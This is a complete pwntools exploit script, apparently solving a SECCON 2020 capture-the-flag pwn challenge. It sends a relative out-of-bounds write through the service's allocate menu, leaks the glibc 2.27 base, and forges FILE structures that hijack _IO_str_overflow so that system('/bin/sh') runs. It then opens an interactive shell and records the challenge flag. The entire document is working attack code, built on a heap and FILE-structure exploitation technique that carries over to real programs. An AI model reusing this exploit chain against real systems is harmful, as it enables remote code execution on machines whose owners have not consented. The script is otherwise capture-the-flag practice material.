#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
from IO_FILE import *
import random
#Utils
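def allocate(alloc_size, read_size, data, silent=False):
    """Drive menu option 1 of the target service: allocate, then read data.

    The service is answered with four lines in order: the menu choice ``1``,
    an allocation size, a separate read size, and the payload. The two sizes
    are independent of each other; the calls in ``__main__`` pass a
    ``read_size`` that is larger than ``alloc_size``.

    Args:
        alloc_size: value sent at the first ``size:`` prompt.
        read_size: value sent at the second ``size:`` prompt.
        data: payload sent at the ``data:`` prompt (str or bytes, whatever
            pwntools' ``sendline`` accepts).
        silent: when true, the four lines are written back-to-back without
            waiting for the prompts (the second ``allocate`` call in
            ``__main__`` uses this); when false each line waits for its prompt.

    Relies on the module-level ``io`` tube that ``__main__`` opens.
    """
    # Prompt/answer pairs in the order the service asks for them.
    steps = (
        ('> ', '1'),
        ('size: ', str(alloc_size)),
        ('size: ', str(read_size)),
        ('data: ', data),
    )
    for prompt, line in steps:
        if silent:
            io.sendline(line)
        else:
            io.sendlineafter(prompt, line)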
# glibc 2.27 symbol offsets, matching the ./libc-2.27.so that the commented-out
# local process(...) line in __main__ preloads. Every value here is relative to
# libc_base, which __main__ recovers from the leak at runtime.
_IO_2_1_stdout_ = 0x3EC760
_IO_2_1_stdin_  = 0x3EBA00
system          = 0x4F4E0
str_binsh       = 0x1B40FA
_IO_list_all    = 0x3EC660
_IO_file_jumps  = 0x3E82A0

# _IO_str_jumps is computed relative to _IO_file_jumps rather than taken from
# the symbol table; _IO_str_overflow is the slot 0x18 bytes into that table.
_IO_str_jumps    = _IO_file_jumps + 0xC0
_IO_str_overflow = _IO_str_jumps + 0x18

# Sizes handed to allocate(); the read size is larger than the allocation size
# and __main__ adds per-call offsets on top of read_size.
alloc_size = 0x3444444
read_size  = 0x3445000
#Exploit
if __name__ =='__main__':
    # Target selection: a local process with the bundled libc (commented out)
    # or the original SECCON 2020 service. Host and port are hard-coded here.
    # io = process('./chall_ld',env={'LD_PRELOAD':'./libc-2.27.so'})
    io = remote('pwn-neko.chal.seccon.jp',9003)
    # Two allocations whose read sizes are read_size plus an _IO_2_1_stdout_-
    # relative offset; the first waits for prompts, the second is sent blind.
    allocate(alloc_size,read_size+_IO_2_1_stdout_-0xf+0x10,'HK')
    allocate(alloc_size,read_size*2+_IO_2_1_stdout_-0xf+0x20,'HK',silent=True)
    # Leak: 16 bytes are read back and the second qword, minus the constant
    # 0x3ed8b0, is taken as libc_base. NOTE(review): 0x3ed8b0 is presumably the
    # in-libc offset of whatever pointer lands in that qword for this build —
    # confirm against the libc used; nothing here validates the result.
    libc_base = u64(io.recvn(0x10)[0x8:]) - 0x3ed8b0
    print(hex(libc_base))
    # Third allocation, this time offset relative to _IO_2_1_stdin_.
    allocate(alloc_size,read_size*3+_IO_2_1_stdin_-0xf+0x38,'1')
    # First forged 64-bit FILE, built with the project-local IO_FILE helper
    # (its construct() field semantics are not visible here). All read/write
    # pointers sit at _IO_2_1_stdin_+0x50 (read_end 83 bytes lower); buf_base
    # and buf_end span 0x100 bytes starting at _IO_2_1_stdout_. Only the first
    # 0x50 bytes of the struct are sent, followed by b' 1'.
    IO_file = IO_FILE_plus(arch=64)
    stream = IO_file.construct(
        flags=0xfbad208b,
        read_ptr=libc_base+_IO_2_1_stdin_+0x50+1,
        read_end=libc_base+_IO_2_1_stdin_+0x50+1-83,
        read_base=libc_base+_IO_2_1_stdin_+0x50,
        write_base=libc_base+_IO_2_1_stdin_+0x50,
        write_ptr=libc_base+_IO_2_1_stdin_+0x50,
        write_end=libc_base+_IO_2_1_stdin_+0x50,
        buf_base=libc_base+_IO_2_1_stdout_,
        buf_end=libc_base+_IO_2_1_stdout_+0x100
    )
    io.sendlineafter('> ',stream[0x0:0x50]+b' 1')
    # Second forged FILE: write_ptr and buf_end are both half of
    # (str_binsh - 100) in libc, lock points 8 bytes past _IO_list_all and the
    # vtable is _IO_str_overflow - 0x38. The address of system is appended
    # directly after the struct and the whole buffer is sent as one line.
    stdout_stream = IO_file.construct(
        flags=0,buf_base=0,
        buf_end=(libc_base+str_binsh-100)//2,write_ptr=(libc_base+str_binsh-100)//2,
        write_base=0,
        lock=libc_base+_IO_list_all+0x8,
        vtable=libc_base+_IO_str_overflow-0x38)
    stdout_stream += p64(libc_base+system)
    io.sendline(stdout_stream)
    # Flag recorded by the author for this challenge.
    # SECCON{r3l4t1v3_nu11_wr1t3_pr1m1t1v3_2_sh3ll}
    io.interactive()